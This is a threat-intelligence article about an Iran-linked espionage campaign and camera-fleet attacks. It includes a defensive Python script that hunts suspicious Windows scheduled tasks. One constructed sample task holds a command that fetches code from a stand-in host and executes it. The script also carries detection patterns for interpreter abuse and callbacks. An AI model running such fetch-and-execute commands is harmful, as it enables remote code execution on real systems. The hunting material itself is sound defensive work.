MuddyWater Breaches US Networks; Broadcom Flags Dindoor and Fakeset
Operational Synopsis
Broadcom threat hunters detected a sustained espionage campaign whose artifacts Broadcom links to the Iran‑aligned cluster often labeled MuddyWater. From that telemetry, analysts recovered two previously unpublicized implants — a native/PHP‑like payload referred to as Dindoor and a Python loader/stager called Fakeset — both observed using code‑signing certificates populated with fabricated personal names (one certificate lists a person rendered as Ms. Cherne). Forensic linkage confirms exposures across four civilian and commercial environments: an airport, a bank, an NGO operating in two countries, and an aerospace/defense supplier with an overseas branch.
Broadcom teams removed live implants and disrupted active command channels, but their report — reinforced by independent vendor telemetry — warns that dormant credentials, lateral access paths and implanted artifacts likely persist across supply‑chain partners and third‑party estates. Timeline reconstruction indicates many footholds predate the recent kinetic escalation, suggesting deliberate long‑dwell positioning rather than a single opportunistic burst.
Complementary telemetry from Check Point describes a concentrated wave of probes and takeover attempts timed to late February through early March 2026 that targeted consumer- and enterprise-grade camera fleets and management-plane interfaces across Bahrain, Cyprus, Kuwait, Lebanon, Qatar and the UAE, with notable activity observed inside Israel. That vendor found attackers exploiting long‑known firmware and network‑service flaws (not novel zero‑days), staging mass validation and follow‑up observation using commodity VPNs and rented infrastructure — a pattern consistent with automated credential‑validation pipelines and rapid exploitation steps observed broadly across industry telemetry.
Across disclosures the technical picture converges on low‑noise persistence mechanisms (memory‑resident or transient stages), cloud‑hosted command‑and‑control and hybrid bridging techniques (removable‑media relays, innocuous cloud callbacks or abused edge appliances). Check Point’s camera findings underscore a significant, visible attack surface: many devices remain internet‑accessible and unpatched, enabling high‑volume enumeration that fuels automated pipelines. Combined with Broadcom’s certificate reuse observations, the operational tradecraft prioritizes stealthy long‑term access while compressing attacker time‑to‑exploit once credentials or management-plane access are validated.
Attribution across vendors is inconsistent: Broadcom maps its artifacts into a MuddyWater cluster, while Check Point ties the camera activity to actors tracked as Handala. These differences more likely reflect overlapping toolchains, shared or recycled signing artifacts and convergent automation than conclusive evidence of fully distinct operators. Practically, defenders should accept attribution ambiguity and prioritize containment, credential and certificate revocation, and exhaustive identity‑centric hunts over waiting for attribution consensus.
Immediate defensive priorities are accelerated token and credential revocation, expedited invalidation of discovered certificates, extended endpoint and identity hunts looking for anomalous scheduled tasks and memory‑resident stages, and urgent validation of third‑party and supplier estates. Specifically for camera and edge fleets: isolate management planes, rotate credentials, move vulnerable feeds behind VPNs/proxies where possible, and accelerate emergency patch cycles for firmware and network‑service bugs.
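The scheduled‑task hunt called for above, as an added example that is not part of Broadcom's report or any vendor's tooling: it scores exported Windows Task Scheduler XML against heuristics tied to the tradecraft described on this page (a staged interpreter such as a Python loader, persistence living in user‑writable paths, URL or encoded‑command arguments that suggest a cloud callback, and hidden tasks running as SYSTEM). The interpreter list, path patterns and scoring threshold are assumptions to be tuned per estate; the two task exports are constructed, not real telemetry.

```python
"""Hunt for suspicious Windows scheduled tasks in exported Task Scheduler XML.

Added example, not Broadcom's or Check Point's code. Assumes tasks were exported
with `schtasks /query /xml` (or pulled from C:\\Windows\\System32\\Tasks) and that
the heuristics below are a sensible starting point for a hunt, not a verdict.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Interpreters and LOLBins an intruder commonly stages for a loader (assumed list).
INTERPRETERS = ("python", "pythonw", "powershell", "pwsh", "wscript", "cscript",
                "mshta", "rundll32", "regsvr32", "cmd")

# Directories a non-admin user can write to; persistence launched from here is a red flag.
USER_WRITABLE = re.compile(
    r"(\\users\\[^\\]+\\appdata\\|\\temp\\|\\tmp\\|\\programdata\\|\\users\\public\\)",
    re.IGNORECASE,
)

# Loosely matches a URL (cloud callback) or an encoded PowerShell command in arguments.
URL_OR_ENCODED = re.compile(
    r"(https?://|-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.IGNORECASE
)


def _text(node, path):
    """Text of the first child matching `path` in the task namespace, or ''."""
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def analyze_task(xml_text: str) -> dict:
    """Return {'name', 'score', 'reasons'} for one Task Scheduler XML document."""
    root = ET.fromstring(xml_text)
    name = _text(root, "t:RegistrationInfo/t:URI")
    user = _text(root, "t:Principals/t:Principal/t:UserId")
    hidden = _text(root, "t:Settings/t:Hidden").lower() == "true"
    reasons = []

    for exec_node in root.findall("t:Actions/t:Exec", NS):
        command = _text(exec_node, "t:Command")
        args = _text(exec_node, "t:Arguments")
        # Normalize to the bare executable name, e.g. "pythonw".
        base = command.replace("/", "\\").split("\\")[-1].lower()
        if base.endswith(".exe"):
            base = base[:-4]
        interp = base in INTERPRETERS
        if interp:
            reasons.append(f"interpreter action: {base}")
        if USER_WRITABLE.search(command) or USER_WRITABLE.search(args):
            reasons.append("runs from user-writable path")
        if URL_OR_ENCODED.search(args):
            reasons.append("URL or encoded command in arguments")
        if interp and user.upper() in ("S-1-5-18", "SYSTEM"):
            reasons.append("interpreter runs as SYSTEM")
    if hidden:
        reasons.append("task is hidden")
    return {"name": name, "score": len(reasons), "reasons": reasons}


def hunt(exports: list, threshold: int = 2) -> list:
    """Analyze each export and return those scoring at or above `threshold`."""
    return [r for r in (analyze_task(x) for x in exports) if r["score"] >= threshold]


# Constructed sample exports (XML declaration omitted so they parse as str).
BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>"""

SUSPICIOUS_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\OneDriveSync</URI></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\\ProgramData\\py\\pythonw.exe</Command><Arguments>-c "import urllib.request;exec(urllib.request.urlopen('https://example.invalid/s').read())"</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for hit in hunt([BENIGN_TASK, SUSPICIOUS_TASK]):
        print(hit["name"], hit["score"], "; ".join(hit["reasons"]))
```

The score is deliberately additive rather than a single signature: a Python interpreter under ProgramData is unremarkable on a developer workstation, but one that is also hidden, runs as SYSTEM and fetches code over HTTPS is exactly the low‑noise, cloud‑backed persistence the vendors describe. Feed the function a directory of real exports and triage the top scores first.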
Longer‑term mitigations include hardware‑backed MFA, stricter browser and session governance, segmentation of management and operational planes (including SD‑WAN and edge appliances), controls on removable media and staged interpreters, and cross‑provider coordination to disrupt cloud‑hosted C2. Given the affected sectors — aviation, finance, NGOs and defense supply chains — organizations should also prepare for regulatory scrutiny, insurance impacts and cross‑border investigative cooperation.
In short, Broadcom’s disruption removed active processes and blocked immediate exfiltration, but the strategic risk endures: pre‑positioned implants, recycled signing artifacts and the broad abuse of cloud and edge infrastructure (amplified by automation and commodity infrastructure) create a durable collection capability that requires identity‑first, cross‑domain hunting and stricter supply‑chain trust validation.